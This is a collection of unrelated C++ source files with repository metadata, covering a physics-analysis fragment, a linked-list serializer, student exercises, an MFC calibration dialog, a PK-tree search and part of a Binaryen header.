lv_genTprime.Eta()); SetValue("genTprimePhi" , lv_genTprime.Phi()); SetValue("genTprimeEnergy" , lv_genTprime.E()); SetValue("genTprimeMass" , lv_genTprime.M()); //TpTop - top from Tprime SetValue("genTpTopPt" , lv_genTop.Pt()); SetValue("genTpTopEta" , lv_genTop.Eta()); SetValue("genTpTopPhi" , lv_genTop.Phi()); SetValue("genTpTopEnergy" , lv_genTop.E()); SetValue("genTpTopMass" , lv_genTop.M()); //Higgs SetValue("genHiggsPt" , lv_genHiggs.Pt()); SetValue("genHiggsEta" , lv_genHiggs.Eta()); SetValue("genHiggsPhi" , lv_genHiggs.Phi()); SetValue("genHiggsEnergy" , lv_genHiggs.E()); SetValue("genHiggsMass" , lv_genHiggs.M()); //W SetValue("genWPt" , lv_genW.Pt()); SetValue("genWEta" , lv_genW.Eta()); SetValue("genWPhi" , lv_genW.Phi()); SetValue("genWEnergy" , lv_genW.E()); SetValue("genWMass" , lv_genW.M()); //Rizki testing to include gen info - end // Generator information double _genTopMass = -1.0; double _genTopPt = -1.0; double _genDrLeptonTopBjet = -9999.0; double _genTopBjetPt = -1.0; double _genTopBjetEta = -1.0; double _genTopBjetPhi = -1.0; if (isTB_) { edm::Handle<reco::GenParticleCollection> genParticles; edm::InputTag genParticles_it = edm::InputTag("prunedGenParticles"); event.getByLabel(genParticles_it, genParticles); int qLep = 0; math::XYZTLorentzVector lv_genLep; math::XYZTLorentzVector lv_genNu; math::XYZTLorentzVector lv_genB; math::XYZTLorentzVector lv_genBbar; for (size_t i = 0; i < genParticles->size(); i++) { const reco::GenParticle & p = (*genParticles).at(i); if (p.status() == 3) { if (fabs(p.pdgId())==11 or fabs(p.pdgId())==13) { lv_genLep = p.p4(); if (p.pdgId()<0) qLep = 1; else qLep = -1; } if (fabs(p.pdgId())==12 or fabs(p.pdgId())==14) lv_genNu = p.p4(); if (p.pdgId()==5) lv_genB = p.p4(); if (p.pdgId()==-5) lv_genBbar = p.p4(); } } math::XYZTLorentzVector lv_genTop; math::XYZTLorentzVector lv_genOtherTop; if (qLep > 0) { lv_genTop = lv_genLep + lv_genNu + lv_genB; lv_genOtherTop = lv_genLep + lv_genNu + lv_genBbar; } else { lv_genTop = lv_genLep + lv_genNu + lv_genBbar; lv_genOtherTop = lv_genLep + lv_genNu + lv_genB; } _genTopMass = lv_genTop.M(); _genTopPt = lv_genTop.Pt(); _genTopBjetPt = (qLep<0?lv_genBbar.Pt():lv_genB.Pt()); _genTopBjetEta = (qLep<0?lv_genBbar.Eta():lv_genB.Eta()); _genTopBjetPhi = (qLep<0?lv_genBbar.Phi():lv_genB.Phi()); double deta = -999.0; double dphi = -999.0; if (qLep<0) { deta = lv_genLep.Eta()-lv_genBbar.Eta(); dphi = lv_genLep.Phi()-lv_genBbar.Phi(); if ( dphi > TMath::Pi() ) dphi -= 2.*TMath::Pi(); if ( dphi <= -TMath::Pi() ) dphi += 2.*TMath::Pi(); _genDrLeptonTopBjet = TMath::Sqrt(deta*deta + dphi*dphi); } else { deta = lv_genLep.Eta()-lv_genB.Eta(); dphi = lv_genLep.Phi()-lv_genB.Phi(); if ( dphi > TMath::Pi() ) dphi -= 2.*TMath::Pi(); if ( dphi <= -TMath::Pi() ) dphi += 2.*TMath::Pi(); _genDrLeptonTopBjet = TMath::Sqrt(deta*deta + dphi*dphi); } } SetValue("genTopMass", _genTopMass); SetValue("genTopPt", _genTopPt); SetValue("genDrLeptonTopBjet", _genDrLeptonTopBjet); SetValue("genTopBjetPt", _genTopBjetPt); SetValue("genTopBjetEta", _genTopBjetEta); SetValue("genTopBjetPhi", _genTopBjetPhi); double _genTTMass = -1.0; if (isTT_) { edm::Handle<reco::GenParticleCollection> genParticles; edm::InputTag genParticles_it = edm::InputTag("prunedGenParticles"); event.getByLabel(genParticles_it, genParticles); math::XYZTLorentzVector lv_genT; math::XYZTLorentzVector lv_genTbar; for (size_t i = 0; i < genParticles->size(); i++) { const reco::GenParticle & p = (*genParticles).at(i); if (p.pdgId()==6) lv_genT = p.p4(); if (p.pdgId()==-6) lv_genTbar = p.p4(); } math::XYZTLorentzVector lv_genTT = lv_genT + lv_genTbar; _genTTMass = lv_genTT.M(); } SetValue("genTTMass", _genTTMass); return 0; }
c3474719e486b03a1d141b8feda991d32e8ccc16
d7cb39a29813f0d5a3ac848afc6581ba9dc7b57c
/List.cpp
e6d205d50fd9d1e7da7391dce61bf950ff3221e3
[]
no_license
lav0/List_Serialization.Saber_Interactive_Test
fb7f88bc3a6f7dfaa889977afb39170b552eb691
c62e9fb442ec02d431e11a738c9dcadf524a0929
refs/heads/master
2020-04-14T21:27:17.658185
2015-06-09T01:54:21
2015-06-09T01:54:21
37,103,656
0
0
null
null
null
null
UTF-8
C++
false
false
5,845
cpp
List.cpp
// // List.cpp // serializedList // // Created by MacBook on 07.06.15. // Copyright (c) 2015 Lav. All rights reserved. // #include "List.h" #include "stdlib.h" #include <map> #include <vector> //============================================================================== std::string findBetween( const std::string& a_strSource, const std::string& a_strLeft, const std::string& a_strRight, size_t& a_position) { auto indexLeft = a_strSource.find(a_strLeft, a_position) + a_strLeft.length(); auto indexRight = a_strSource.find(a_strRight, a_position); a_position = indexRight + a_strRight.length(); return a_strSource.substr(indexLeft, indexRight - indexLeft); } //============================================================================== // //============================================================================== List::List() : head(nullptr) , tail(nullptr) , count(0) { } //============================================================================== List::~List() { clean(); } //============================================================================== void List::clean() { auto itr = head; while (itr != nullptr) { auto next = itr->next; delete itr; itr = next; } } //============================================================================== void List::Insert(const std::string& data) { if (head == nullptr) { head = new ListNode; head->prev = nullptr; tail = head; } else { tail->next = new ListNode; tail->next->prev = tail; tail = tail->next; } tail->rand = nullptr; tail->next = nullptr; tail->data = data; ++count; } //============================================================================== void List::Serialize(std::ostream &file) { std::map<ListNode*, int> indexedMap; //////////////////////////////////////////////////////////////////////////// // Filling up map of indexes for all nodes //////////////////////////////////////////////////////////////////////////// int index = 0; auto walker = head; while (walker != nullptr) { indexedMap.insert(std::pair<ListNode*, int>(walker, index)); ++index; walker = walker->next; } //////////////////////////////////////////////////////////////////////////// // Writing in xml-like document //////////////////////////////////////////////////////////////////////////// std::string start("<start size=" + std::to_string(count) + ">\n"); file.write(start.c_str(), start.length()); //////////////////////////////////////////////////////////////////////////// // Writing one by one node's data and index of pointed by rand node //////////////////////////////////////////////////////////////////////////// auto node = head; while (node != nullptr) { int randIndex = -1; if (node->rand != nullptr) randIndex = indexedMap[node->rand]; std::string strNode("<node>\n"); strNode.append(" <data=\"" + node->data + "\">\n\0"); strNode.append(" <rand=" + std::to_string(randIndex) + ">\n</node>\n"); file.write(strNode.c_str(), strNode.length()); node = node->next; } file.write("<end>", 5 * sizeof(char)); } //============================================================================== void List::Deserialize(std::istream &stream) { clean(); auto intSize = 0; std::string str; //////////////////////////////////////////////////////////////////////////// // Reading size of the list //////////////////////////////////////////////////////////////////////////// if (std::getline(stream, str)) { size_t pos = 0; auto strSize = findBetween(str, "size=", ">", pos); intSize = atoi(strSize.c_str()); } std::vector<ListNode*> nodesRand; std::vector<int> indexesRand; nodesRand.reserve(intSize); indexesRand.reserve(intSize); size_t position = 0; std::getline(stream, str, '\0'); //////////////////////////////////////////////////////////////////////////// // 1. Reading and inserting data into the list // 2. Mapping of the read nodes and indexes of their random nodes //////////////////////////////////////////////////////////////////////////// for (int i=0; i<intSize; ++i) { std::string strNode; strNode = findBetween(str, "<node>", "</node>", position); size_t innerPos = 0; auto strData = findBetween(strNode, "data=\"", "\">\n", innerPos); auto strRand = findBetween(strNode, "rand=", ">\n", innerPos); auto intRand = atoi(strRand.c_str()); Insert(strData); nodesRand.push_back(tail); indexesRand.push_back(intRand); } //////////////////////////////////////////////////////////////////////////// // Setting up the random pointers //////////////////////////////////////////////////////////////////////////// auto nodesCount = 0; auto nodesWalker = head; while (nodesWalker != nullptr) { nodesWalker->rand = nodesRand[indexesRand[nodesCount]]; nodesWalker = nodesWalker->next; ++nodesCount; } } //============================================================================== void List::SetRandomPointers() { auto itr = head; while (itr != nullptr) { int rnd = rand() % count; int cnt = 0; auto randNode = head; while (cnt++ != rnd) randNode = randNode->next; itr->rand = randNode; itr = itr->next; } }
780a380d912b7571ec11869a7d15ed9cfd5db33e
6a20b2dd262880aeb20678297f1df7addab23d84
/0_homeworks/C++/basic/2_base+/Пара_2(C style)/09 10 2017 v2/Source.cpp
cd78394ef4172f43d0018a763292b9c9c4aa1c1b
[ "MIT" ]
permissive
Team-on/works
23124bbbff56cccbf7101f079ba7c02823d298d4
16978b61c0d6bcb37e910efb4b5b80e9a2460230
refs/heads/master
2021-04-06T01:00:15.159916
2019-11-06T01:57:27
2019-11-06T01:57:27
124,766,423
10
0
MIT
2020-08-25T10:31:56
2018-03-11T14:46:23
C#
UTF-8
C++
false
false
753
cpp
Source.cpp
#include <iostream> using namespace std; typedef unsigned short int usi; #define pause system("pause") #define clear system("cls") #define DEBUG int main() { setlocale(0, "rus"); usi sizeRow = 3; usi sizeCol = 3; #ifdef DEBUG scanf("%d %d", &sizeRow, &sizeCol); #endif // DEBUG int **mtx = (int**) calloc(sizeRow, sizeof(int*)); for(usi i = 0; i < sizeRow; i++) mtx[i] = (int*)calloc(sizeCol, sizeof(int*)); for (usi i = 0; i < sizeRow; i++) for (usi j = 0; j < sizeCol; j++) mtx[i][j] = rand() % 9 + 1; for (usi i = 0; i < sizeRow; i++) { for (usi j = 0; j < sizeCol; j++) printf("%d ", mtx[i][j]); printf("\n"); } printf("\n"); for (usi i = 0; i < sizeRow; i++) free(mtx[i]); free(mtx); pause; return 0; }
aac27fd0aa04ce123af26b68a3505a5ade5bd0f1
b8b0840b8af9169841bf7fb6ee5ca549b700c364
/datastructuresCPP.cpp
304f6c74055e385d6d9baad22f579d2ea35a997c
[]
no_license
AugustDanell/Datastructures
1ecb90e5b2cba11ef83c42edea144aa6df29b68b
7f7f122fb633488fdbde96563bf332072ab41c52
refs/heads/main
2023-07-15T00:39:50.207550
2021-08-24T04:00:43
2021-08-24T04:00:43
381,686,444
0
0
null
null
null
null
UTF-8
C++
false
false
1,448
cpp
datastructuresCPP.cpp
#include <iostream> using namespace std; // Here we insert declarations of the classes we want to make use of and global constants: class stack; class graph_node; class graph; const int MAX_SIZE = 200000; // --------------------------------------------------------------------- /* STACK * This is an adhoc implementation of the stack. It allocates an array of size 'MAX_SIZE', as is defined above. This array is an auxilary array * in which data is stored. However, any data above the current size is considered 'trash data' and will be written over if insertion() is called. * For example, if we have aux = [1,2...], size = 2. Now we call pop() -> aux = [1,2..], but size = 1, meaning that the 2 on index 1 is 'trashdata'. * If we now call insertion(3), we get aux = [1,3...], and pop() --> returns 3, and in aux [1,3..], the 3 is now considered to be 'trash data'. */ class stack{ int max_size; int size = 0; int aux_array[MAX_SIZE]; public: void insertion(int n) { aux_array[size] = n; size += 1; } int pop(){ size -= 1; return aux_array[size]; } }; class graph_node { }; class graph { private: int max_size; int size = 0; int aux_array[]; public: void set_max_size(int n) { max_size = n; aux_array[n]; } }; int main() { std::cout << "Hello World!\n"; stack s; s.insertion(4); std::cout << s.pop(); }
a3041e4f8ceae84aa930e3ad5271ed9cfd4a2b71
a4a255e94b31172b9567d91051b1c89623439e1e
/18.cpp
db04e42aee838b8966891c74959b7caa7427676d
[]
no_license
Aasthagupta03/coding_practice
44bd7a141a211bfd235c8c45376c118266ce3b99
832137477ae4899c4dd7345697abc7c9aefa033c
refs/heads/main
2023-09-04T10:00:34.635948
2021-10-19T17:26:33
2021-10-19T17:26:33
367,816,603
2
0
null
null
null
null
UTF-8
C++
false
false
538
cpp
18.cpp
// C++ implementation of simple method to find count of // pairs with given sum. #include <bits/stdc++.h> using namespace std; int pairsCount(int arr[], int n, int sum) { unordered_map<int, int> m; for (int i = 0; i < n; i++) m[arr[i]]++; int tcount = 0; for (int i = 0; i < n; i++) { tcount += m[sum - arr[i]]; if (sum - arr[i] == arr[i]) tcount--; } return tcount / 2; } int main() { int n,sum=0; int arr[n]; cin>>n; for(int i=0;i<n;i++) cin>>arr[i]; cin>>sum; cout<< pairsCount(arr, n, sum); return 0; }
3dfd33e4fc7a470f4adab9c38bf9b283b7b0d96b
3b6e22060e9a147b7c2695f449556abf71a8f204
/GODAWare/9_2_final_oneGODAWare_8_8/CalibrationDlg.cpp
994dfa213c17d34ce8b84ad86b2d7d58a7d24a69
[]
no_license
ErikHurum/S2Prog
205b93d04e57d2dea31e50458b3c6ad6c97feae3
6ce48c63c992227639cd3a877f6eab2b87c9534d
refs/heads/master
2023-08-30T19:59:14.383220
2023-08-29T12:29:08
2023-08-29T12:29:08
91,278,631
0
0
null
null
null
null
GB18030
C++
false
false
6,503
cpp
CalibrationDlg.cpp
// CalibrationDlg.cpp : 实现文件 // #include "stdafx.h" #include "MFC.h" #include "CalibrationDlg.h" // CCalibrationDlg IMPLEMENT_DYNAMIC(CCalibrationDlg, CDialogEx) CCalibrationDlg::CCalibrationDlg(CWnd* pParent) :CDialogEx(IDD_CALIBRATION, pParent), validPoint(0) { for (int i = 0; i < 33; i++) { m_measuredVal[i] = m_caliVal[i] = 0; } } BEGIN_MESSAGE_MAP(CCalibrationDlg, CDialogEx) ON_BN_CLICKED(IDOK, &CCalibrationDlg::OnBnClickedOk) ON_BN_CLICKED(IDC_LOAD, &CCalibrationDlg::OnBnClickedLoad) ON_BN_CLICKED(IDC_SAVE, &CCalibrationDlg::OnBnClickedSave) END_MESSAGE_MAP() // CCalibrationDlg 消息处理程序 void CCalibrationDlg::DoDataExchange(CDataExchange* pDX) { CDialogEx::DoDataExchange(pDX); DDX_Control(pDX, IDC_MEASUREDVAL0, m_editMeasuredVal[0]); DDX_Control(pDX, IDC_MEASUREDVAL1, m_editMeasuredVal[1]); DDX_Control(pDX, IDC_MEASUREDVAL2, m_editMeasuredVal[2]); DDX_Control(pDX, IDC_MEASUREDVAL3, m_editMeasuredVal[3]); DDX_Control(pDX, IDC_MEASUREDVAL4, m_editMeasuredVal[4]); DDX_Control(pDX, IDC_MEASUREDVAL5, m_editMeasuredVal[5]); DDX_Control(pDX, IDC_MEASUREDVAL6, m_editMeasuredVal[6]); DDX_Control(pDX, IDC_MEASUREDVAL7, m_editMeasuredVal[7]); DDX_Control(pDX, IDC_MEASUREDVAL8, m_editMeasuredVal[8]); DDX_Control(pDX, IDC_MEASUREDVAL9, m_editMeasuredVal[9]); DDX_Control(pDX, IDC_MEASUREDVAL10, m_editMeasuredVal[10]); DDX_Control(pDX, IDC_MEASUREDVAL11, m_editMeasuredVal[11]); DDX_Control(pDX, IDC_MEASUREDVAL12, m_editMeasuredVal[12]); DDX_Control(pDX, IDC_MEASUREDVAL13, m_editMeasuredVal[13]); DDX_Control(pDX, IDC_MEASUREDVAL14, m_editMeasuredVal[14]); DDX_Control(pDX, IDC_MEASUREDVAL15, m_editMeasuredVal[15]); DDX_Control(pDX, IDC_MEASUREDVAL16, m_editMeasuredVal[16]); DDX_Control(pDX, IDC_MEASUREDVAL17, m_editMeasuredVal[17]); DDX_Control(pDX, IDC_MEASUREDVAL18, m_editMeasuredVal[18]); DDX_Control(pDX, IDC_MEASUREDVAL19, m_editMeasuredVal[19]); DDX_Control(pDX, IDC_MEASUREDVAL20, m_editMeasuredVal[20]); DDX_Control(pDX, IDC_MEASUREDVAL21, m_editMeasuredVal[21]); DDX_Control(pDX, IDC_MEASUREDVAL22, m_editMeasuredVal[22]); DDX_Control(pDX, IDC_MEASUREDVAL23, m_editMeasuredVal[23]); DDX_Control(pDX, IDC_MEASUREDVAL24, m_editMeasuredVal[24]); DDX_Control(pDX, IDC_MEASUREDVAL25, m_editMeasuredVal[25]); DDX_Control(pDX, IDC_MEASUREDVAL26, m_editMeasuredVal[26]); DDX_Control(pDX, IDC_MEASUREDVAL27, m_editMeasuredVal[27]); DDX_Control(pDX, IDC_MEASUREDVAL28, m_editMeasuredVal[28]); DDX_Control(pDX, IDC_MEASUREDVAL29, m_editMeasuredVal[29]); DDX_Control(pDX, IDC_MEASUREDVAL30, m_editMeasuredVal[30]); DDX_Control(pDX, IDC_MEASUREDVAL31, m_editMeasuredVal[31]); DDX_Control(pDX, IDC_MEASUREDVAL32, m_editMeasuredVal[32]); DDX_Control(pDX, IDC_CALIVAL0, m_editCaliVal[0]); DDX_Control(pDX, IDC_CALIVAL1, m_editCaliVal[1]); DDX_Control(pDX, IDC_CALIVAL2, m_editCaliVal[2]); DDX_Control(pDX, IDC_CALIVAL3, m_editCaliVal[3]); DDX_Control(pDX, IDC_CALIVAL4, m_editCaliVal[4]); DDX_Control(pDX, IDC_CALIVAL5, m_editCaliVal[5]); DDX_Control(pDX, IDC_CALIVAL6, m_editCaliVal[6]); DDX_Control(pDX, IDC_CALIVAL7, m_editCaliVal[7]); DDX_Control(pDX, IDC_CALIVAL8, m_editCaliVal[8]); DDX_Control(pDX, IDC_CALIVAL9, m_editCaliVal[9]); DDX_Control(pDX, IDC_CALIVAL10, m_editCaliVal[10]); DDX_Control(pDX, IDC_CALIVAL11, m_editCaliVal[11]); DDX_Control(pDX, IDC_CALIVAL12, m_editCaliVal[12]); DDX_Control(pDX, IDC_CALIVAL13, m_editCaliVal[13]); DDX_Control(pDX, IDC_CALIVAL14, m_editCaliVal[14]); DDX_Control(pDX, IDC_CALIVAL15, m_editCaliVal[15]); DDX_Control(pDX, IDC_CALIVAL16, m_editCaliVal[16]); DDX_Control(pDX, IDC_CALIVAL17, m_editCaliVal[17]); DDX_Control(pDX, IDC_CALIVAL18, m_editCaliVal[18]); DDX_Control(pDX, IDC_CALIVAL19, m_editCaliVal[19]); DDX_Control(pDX, IDC_CALIVAL20, m_editCaliVal[20]); DDX_Control(pDX, IDC_CALIVAL21, m_editCaliVal[21]); DDX_Control(pDX, IDC_CALIVAL22, m_editCaliVal[22]); DDX_Control(pDX, IDC_CALIVAL23, m_editCaliVal[23]); DDX_Control(pDX, IDC_CALIVAL24, m_editCaliVal[24]); DDX_Control(pDX, IDC_CALIVAL25, m_editCaliVal[25]); DDX_Control(pDX, IDC_CALIVAL26, m_editCaliVal[26]); DDX_Control(pDX, IDC_CALIVAL27, m_editCaliVal[27]); DDX_Control(pDX, IDC_CALIVAL28, m_editCaliVal[28]); DDX_Control(pDX, IDC_CALIVAL29, m_editCaliVal[29]); DDX_Control(pDX, IDC_CALIVAL30, m_editCaliVal[30]); DDX_Control(pDX, IDC_CALIVAL31, m_editCaliVal[31]); DDX_Control(pDX, IDC_CALIVAL32, m_editCaliVal[32]); } void CCalibrationDlg::OnBnClickedOk() { for (int i = 0; i < 33; i++) { CString str; m_editMeasuredVal[i].GetWindowText(str); m_measuredVal[i] = float(_tstof(str)); m_editCaliVal[i].GetWindowText(str); m_caliVal[i] = float(_tstof(str)); } OnOK(); } void CCalibrationDlg::OnBnClickedLoad() { CFileDialog fileDlg(TRUE, _T(".csv"),0 ,4|2 ,_T("Calibration Data Files (*.csv)|*.csv|"),this); if (fileDlg.DoModal() == IDOK) { CString filename(fileDlg.GetPathName()); CStdioFile file; if (file.Open(filename, CFile::modeRead)) { for (int i = 0; i < 33; i++) { CString str, measuredVal, caliVal; if (!file.ReadString(str)) break; int dividePos = str.Find(_T("\t")); measuredVal = str.Left(dividePos); caliVal = str.Right(str.GetLength() - dividePos -1); m_editMeasuredVal[i].SetWindowText(measuredVal); m_editCaliVal[i].SetWindowText(caliVal); } } } } void CCalibrationDlg::OnBnClickedSave() { CFileDialog fileDlg(FALSE, _T(".csv"),0 ,4|2 ,_T("Calibration Data Files (*.csv)|*.csv|"),this); if (fileDlg.DoModal() == IDOK) { CString filename(fileDlg.GetPathName()); CStdioFile file; if (file.Open(filename, CFile::modeWrite | CFile::modeCreate)) { for (int i = 0; i < 33; i++) { CString measuredVal, caliVal; m_editMeasuredVal[i].GetWindowText(measuredVal); m_editCaliVal[i].GetWindowText(caliVal); file.WriteString(measuredVal + _T("\t") + caliVal + _T("\n")); } } } } BOOL CCalibrationDlg::OnInitDialog() { CDialogEx::OnInitDialog(); // TODO: 在此添加额外的初始化 for (int i = validPoint; i < 33; i++) { m_editMeasuredVal[i].EnableWindow(false); m_editCaliVal[i].EnableWindow(false); } for (int i = 0; i < validPoint ; i++) { CString s; s.Format(_T("%.3f"), m_measuredVal[i]); m_editMeasuredVal[i].SetWindowText(s); s.Format(_T("%.3f"), m_caliVal[i]); m_editCaliVal[i].SetWindowText(s); } return TRUE; // return TRUE unless you set the focus to a control // 异常: OCX 属性页应返回 FALSE }
edadc3be4e2d7ad5688dd386c69a6560cfb29606
f6c2cef3c83c03cd197fa5e2ff136939ca86db6c
/src/pk_tree.cpp
ca8144067b00e2db826b611035b880546bf5ff5d
[]
no_license
ktp-forked-repos/SNNAHDD
70d386a1c17741d5553582a627ff9c4b6ee79ac9
55e1f1d4730b5e1d29e89e57cacde9ff3c4c54a8
refs/heads/master
2020-05-25T19:29:35.293351
2019-05-10T15:41:28
2019-05-10T15:41:28
null
0
0
null
null
null
null
UTF-8
C++
false
false
4,506
cpp
pk_tree.cpp
#include "pk_tree.h" #include "node.h" #include <iostream> #include <unordered_set> #include <random> #include <limits> #include <set> std::random_device pk_tree::rd; std::mt19937 pk_tree::gen(rd()); pk_tree::pk_tree(std::string file_name, unsigned int K, int I_max) { k = K; i_max = I_max; read_point(file_name); dimension = compute_dimension(); root = std::make_shared<node>(); for(size_t i = 0; i < points.size(); ++i) root->pts.push_back(i); construct(root); } std::unordered_set<int> pk_tree::select(const std::vector<int> &v) const { std::uniform_int_distribution<> dis(0, v.size() - 1); std::unordered_set<int> s; while(s.size() != k) { int index = dis(gen); if(s.find(v[index]) == s.end()) s.insert(v[index]); } return s; } int pk_tree::get_centroid_index(const std::vector<point> &centroid, const point& p) { double max_distance = std::numeric_limits<double>::max(); size_t index = 0; for(size_t i = 0; i < centroid.size(); ++i) { double d = dist(p, centroid[i]); if(d <= max_distance) { max_distance = d; index = i; } } return index; } std::vector<cluster> pk_tree::clustering(const std::vector<point> &centroid, const std::vector<int> &pts) { //std::cout << "the centroid size is " << centroid.size() << std::endl; std::vector<cluster> c(centroid.size()); for(auto&& e : pts) { auto index = get_centroid_index(centroid, points[e]); c[index].push_back(e); } return c; } double pk_tree::average_dim_coordinates(cluster& c, int d) { double sum = 0; for(size_t j = 0; j < c.size(); ++j) sum += points[c[j]][d]; return sum; } point pk_tree::get_mean_point(cluster& c) { point p(dimension); for(int i = 0; i < dimension; ++i) { auto sum = average_dim_coordinates(c, i); p[i] = sum/c.size(); } return p; } std::vector<point> pk_tree::get_P(std::vector<cluster> &C) { std::vector<point> P; for(size_t i = 0; i < C.size(); i++) P.push_back(get_mean_point(C[i])); return P; } void pk_tree::construct(std::shared_ptr<node> &current) { if(current->pts.size() < k) return; std::unordered_set<int> p = select(current->pts); std::vector<point> P = get_points(p); bool coveraged = false; int i = 0; std::vector<cluster> C; while(!coveraged && i < i_max) { C = clustering(P, current->pts); std::vector<point> P_new = get_P(C); if(P == P_new) coveraged = true; P = P_new; i++; } int j = 0; for(auto&& c: C) { if(c.size() == 0) continue; std::shared_ptr<node> child = std::make_shared<node>(); child->center = P[j]; child->pts = c; current->children.push_back(child); construct(current->children.back()); j++; } } std::vector<int> pk_tree::get_top_k(std::set<std::pair<double, int>> &R) { std::vector<int> res(k); unsigned int i = 0; for(auto&& e : R) { if(i >= k) break; res[i++] = e.second; } return res; } std::vector<int> pk_tree::search(point &q, int L) { int count = 0; std::set<std::pair<double, std::shared_ptr<node>>> PQ; std::set<std::pair<double, int>> R; traverse(root, PQ, R, count, q); while(!PQ.empty() && count < L) { auto N = *PQ.begin(); PQ.erase(PQ.begin()); traverse(N.second, PQ, R, count, q); } return get_top_k(R); } void pk_tree::traverse(std::shared_ptr<node> &current, std::set<std::pair<double, std::shared_ptr<node>>> &PQ, std::set<std::pair<double, int>> &R, int &count, point &q) { if(current == nullptr) return; if(current->children.size() == 0 && current->pts.size() != 0) { for(auto&& e: current->pts) { double d = dist(points[e], q); R.insert({d, e}); } count += current->pts.size(); } else { auto C = current->children; std::vector<std::pair<double, std::shared_ptr<node>>> cp; std::shared_ptr<node> cq; double mind = std::numeric_limits<double>::max(); int i = 0; int index = 0; for(auto&& e: C) { double d = dist(e->center, q); cp.push_back({d, e}); if(mind < d) { mind = d; cq = e; index = i; } i++; } cp.erase(cp.begin() + index); PQ.insert(cp.begin(), cp.end()); traverse(cq, PQ, R, count, q); } } std::vector<std::vector<int>> pk_tree::search(std::vector<point> &query, int l) { std::vector<std::vector<int>> res(query.size()); int i = 0; for(auto&& q: query) res[i++] = search(q, l); return res; }
1029adb8ea7e805e102227510f24233e409cec0e
1f62e7ed0b1e7dba07a10f862941b31c6c5cb7c9
/sizeofBinaryTree.cpp
06f1b0d6dc0cbceae12b7ed2999331fa4d1680c4
[]
no_license
LynxBerry/Algorithms
fc7cc661b283a9f6fa291ec6fb5575d1c249e5b7
2106492816c990b3c0ca8a58f4e65cbce24725f5
refs/heads/master
2022-06-20T18:30:12.101360
2022-01-18T08:23:35
2022-01-18T08:23:35
60,399,542
1
0
null
null
null
null
UTF-8
C++
false
false
1,106
cpp
sizeofBinaryTree.cpp
#include <iostream> #include <string> using std::string; // Count the number of nodes in one binary tree // // This problem demonstrates simple binary tree traversal.Given a binary tree, count the number of nodes in the tree. // int size(struct node* node) { struct node { int data; struct node* left; struct node* right; }; struct node* NewNode(int data) { struct node* node = new (struct node); // "new" is like "malloc" node->data = data; node->left = NULL; node->right = NULL; return node; } //recursive method to tranverse the BiTree to count the number int size(struct node* node) { if (node == NULL) { return 0; } /* if (node->left == NULL && node->right == NULL) { return 1; } */ return (size(node->left) + size(node->right) + 1); } int main() { //Initialize BiTree struct node* BiTree = NewNode(2); BiTree->left = NewNode(3); BiTree->right = NewNode(4); BiTree->left->left = NewNode(1); BiTree->left->right = NewNode(5); BiTree->right->left = NewNode(7); std::cout << size(BiTree); return 0; }
8f1932964296c70c5c43580cb15b454cf9aa1bab
85f25a69ec633477f539385fe7782b03a135c1d1
/Programmers/베스트앨범.cpp
bdf949bb35cafe1e7fd6e1b352fb2751bf8ef56c
[]
no_license
jeongbbn/Algorithm
e9df157c34888d7dfe1cf3b73274b3ae7d927ea5
dce6e25ac472929a10d8b2a96575dba1930358a1
refs/heads/master
2022-05-11T09:27:41.371463
2022-05-04T14:56:52
2022-05-04T14:56:52
251,317,835
0
0
null
null
null
null
UTF-8
C++
false
false
1,017
cpp
베스트앨범.cpp
/* 프로그래머스 베스트 앨범 해시+우선순위 큐 */ #include <string> #include <vector> #include <map> #include <algorithm> #include <queue> using namespace std; typedef pair<int,int>pi; map<string,int>m; priority_queue<pi, vector<pi>>pq[105]; int cnt[105]; vector<int> solution(vector<string> genres, vector<int> plays) { vector<int> answer; int p=0; for(int i=0; i<genres.size( ); i++){ if(m.find(genres[i]) != m.end()) { int x = m[genres[i]]; cnt[x]+=plays[i]; pq[x].push({plays[i], -i}); } else { m.insert({genres[i], p}); cnt[p] = plays[i]; pq[p++].push({plays[i], -i}); } } for(int i=0; i<p; i++){ int pos = max_element(cnt, cnt+p) - cnt; for(int j=0; j<2; j++){ if(pq[pos].empty()) break; answer.push_back(-pq[pos].top().second); pq[pos].pop(); } cnt[pos] = -1; } return answer; }
7754fd3b8ceec60b190b4ef061c8868b58657b63
e43972332275bf22bae2f18a66b0b24de9b1cd23
/@rof_addons/mod.cpp
b23fcc74c4013d6666f629fa73af0c3c391e8080
[]
no_license
republic-of-folk/rof_addons
aceb4dcc78acf0131a2db1cf7e24e3e73241c187
b63f57bb7767d26106a93b1637cda28e19d7abc1
refs/heads/master
2023-02-09T14:12:09.470736
2023-02-04T19:10:32
2023-02-04T19:10:32
203,146,465
1
1
null
2021-08-02T20:35:05
2019-08-19T09:58:44
C++
UTF-8
C++
false
false
221
cpp
mod.cpp
name = "Republic of Folk Addons"; picture = "\x\rof\addons\main\rof.paa"; hidePicture = "false"; hideName = "false"; actionName = "Website"; action = "https://republicoffolk.org/"; description = "Republic of Folk Addons";
9bffafbadd08352d08e388e7ff2aeb15c6dd29c6
1e2d8d5beb9d290c789c5a4e2db76aa9bc44320e
/src/ast/hashed.h
04ee7f401975398c95a3f3c8d319a8c6a314ea2c
[ "Apache-2.0" ]
permissive
EOSIO/binaryen
df54ece69ea4f57ff6e91b11c58c2b47832e5183
16d641f62ab14df845c87a63efe4d991b508d19a
refs/heads/eosio
2022-10-13T04:34:57.109314
2018-08-03T02:14:33
2018-08-03T02:14:33
122,224,952
16
40
Apache-2.0
2022-09-21T17:26:11
2018-02-20T16:36:24
Assembly
UTF-8
C++
false
false
1,575
h
hashed.h
/* * Copyright 2017 WebAssembly Community Group participants * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ #ifndef _wasm_ast_hashed_h #include "support/hash.h" #include "wasm.h" #include "ast_utils.h" namespace wasm { // An expression with a cached hash value struct HashedExpression { Expression* expr; size_t hash; HashedExpression(Expression* expr) : expr(expr) { if (expr) { hash = ExpressionAnalyzer::hash(expr); } } HashedExpression(const HashedExpression& other) : expr(other.expr), hash(other.hash) {} }; struct ExpressionHasher { size_t operator()(const HashedExpression value) const { return value.hash; } }; struct ExpressionComparer { bool operator()(const HashedExpression a, const HashedExpression b) const { if (a.hash != b.hash) return false; return ExpressionAnalyzer::equal(a.expr, b.expr); } }; template<typename T> class HashedExpressionMap : public std::unordered_map<HashedExpression, T, ExpressionHasher, ExpressionComparer> { }; } // 